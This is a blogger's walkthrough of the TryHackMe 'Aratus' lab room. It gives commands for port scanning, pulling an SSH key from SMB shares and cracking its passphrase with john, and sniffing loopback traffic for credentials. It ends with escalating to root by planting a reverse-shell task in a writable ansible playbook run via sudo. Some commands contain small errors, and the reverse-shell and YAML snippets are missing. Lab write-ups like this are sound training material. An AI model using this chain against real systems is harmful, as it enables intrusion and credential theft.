Aratus on TryHackMe is an interesting room, below is the path I found that worked for me and doesn’t cover everything I tried, its simply the path I took that worked!
Scoping out a library…
I started out with my masscan and nmap commands;
masscan -p1-65535 <THM_IP> --rate=1000 -e tun0 > ports
awk '{print $4}' ports | sed 's|[/tcp,]||g' > nmapports
nmap -sC -sV -p $(tr '\n' , <nmapports) -Pn -oN ./nmapinitial <THM_IP>From my portscan, there were a few ways we could go;
So, to summarise, FTP had nothing….. The Site seemed like a rabbit hole BUT SMB….. That looked interesting…..
Starting off with the message to Simeon, apparently, he’s left his password everywhere! Looks like i need to find a password!
How Much Reading do I need to do!
I decided to download everything from the SMB to look through it locally using;
recurse on
prompt off
mget *With that downloaded, I start searching for “Password”, “PWD” etc and found…… nothing!
But when I searched for ID with
find . -type f -exec grep -H 'ID' {} \;
So, lets copy that into a file called id_rsa, then chmod 600 rsa and then we can use
ssh -i id_rsa simeon@10.10.5.226We have our initial foothold now?
Absolutely not! That would be too easy!
Not a problem, to get the passphrase
ssh2john id_rsa > sshrsa #if this isn't already installed, links at the end
john sshrsa -w=<path_to_rockyou>Now were in, lets see what we can do!
Not much I can do!
Looking at Simeon, it’s clear we need to escalate! So, I transferred over LSE (see the links at the end) by starting a python webserver on my local machine and used curl on the remote machine.
So what did LSE find?
START PID USER COMMAND
14:18 8770 theodore /usr/bin/python3 /home/theodore/scripts/test-www-auth.py
START PID USER COMMAND
14:18 8771 root ping -c 30 127.0.0.1
[*] sec010 List files with capabilities.................................... yes!
---
/usr/bin/ping = cap_net_admin,cap_net_raw+p
/usr/bin/newgidmap = cap_setgid+ep
/usr/bin/newuidmap = cap_setuid+ep
/usr/sbin/arping = cap_net_raw+p
/usr/sbin/clockdiff = cap_net_raw+p
/usr/sbin/tcpdump = cap_net_admin,cap_net_raw+eip
/usr/sbin/suexec = cap_setgid,cap_setuid+epTheodore has a script running and pinging the localhost, we also have access to tcpdump, lets see what we can find with;
tcpdump -e lo -A
Looks like we have a base64 encoded credential, using CyberChef we can decode this.
With that decoded use su with the username and password you decoded!
Privesc part 2 – Return of LSE
Grabbing the user flag first…
I decided to run LSE again and used the password for the user I switched to, this gave us some things to try to escalate to root.
[!] sud010 Can we list sudo commands without a password?................... yes!
---
Matching Defaults entries for theodore on aratus:
!visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin, env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS", env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY", secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin
User theodore may run the following commands on aratus:
(automation) NOPASSWD: /opt/scripts/infra_as_code.sh
---
[*] fst000 Writable files outside user's home.............................. yes!
---
/run/dbus/system_bus_socket
/run/systemd/private
/run/systemd/journal/socket
/run/systemd/journal/stdout
/run/systemd/notify
/var/tmp
/var/spool/mail/theodore
/var/spool/samba
/tmp
/tmp/.XIM-unix
/tmp/.ICE-unix
/tmp/.Test-unix
/tmp/.X11-unix
/tmp/.font-unix
/tmp/tmp.hEy9yFmRea
/tmp/tmp.JAdtOrZ9vB
/home/simeon/message-to-simeon.txt
/opt/ansible/roles/geerlingguy.apache/tasks/configure-RedHat.yml
/opt/ansible/README.txt
Lets look at the script that automation can run with sudo,
#!/bin/bash
cd /opt/ansible
/usr/bin/ansible-playbook /opt/ansible/playbooks/*.yamlLooking at the script we can see it will run all yaml files within the playbook, luckily, the one that is writable by our current user is within this. To read more on how these work, the documentation is found here https://docs.ansible.com/ansible/latest/user_guide/playbooks.html.
I decided to try the easy way of inserting a task to run a bash reverse shell in the yaml file, which sounded too easy on reflection!
Lets Get Root!
Using a bash reverse shell (I used an online generator, link at the end), create a reverse.sh file using vim and paste your bash reverse shell as below and save this in /tmp.
Then save this by pressing the escape key and typing :wq.
Next we need to add a task into the configure-RedHat.yaml to chmod our by opening it using;
vim /opt/ansible/roles/geerlingguy.apache/tasks/configure-RedHat.yml
Save this as before and lets run it with;
sudo -u automation /opt/scripts/infra_as_code.shNow that’s amended our reverse.sh script, lets actually run this by amending the yaml file again to the below and start a listener on the port we specified in the bash script.
Save this as before and run the script again.
sudo -u automation /opt/scripts/infra_as_code.sh
We now have a root shell and we can get the root flag!
Conclusion
I really enjoyed this room! The lateral movement process was interesting to sniff the network traffic! I could have done the initial foothold a few different ways i.e SSH bruteforce, but in a real task this would have set off some alarm bells!
Thank you to Biniru for the challenge!!
If you have any suggestions for any rooms you want to see, get in touch here!
Marc
Links
Aratus Room – https://tryhackme.com/room/aratus
SSH2John – https://github.com/openwall/john/blob/bleeding-jumbo/run/ssh2john.py
LSE – https://github.com/diego-treitos/linux-smart-enumeration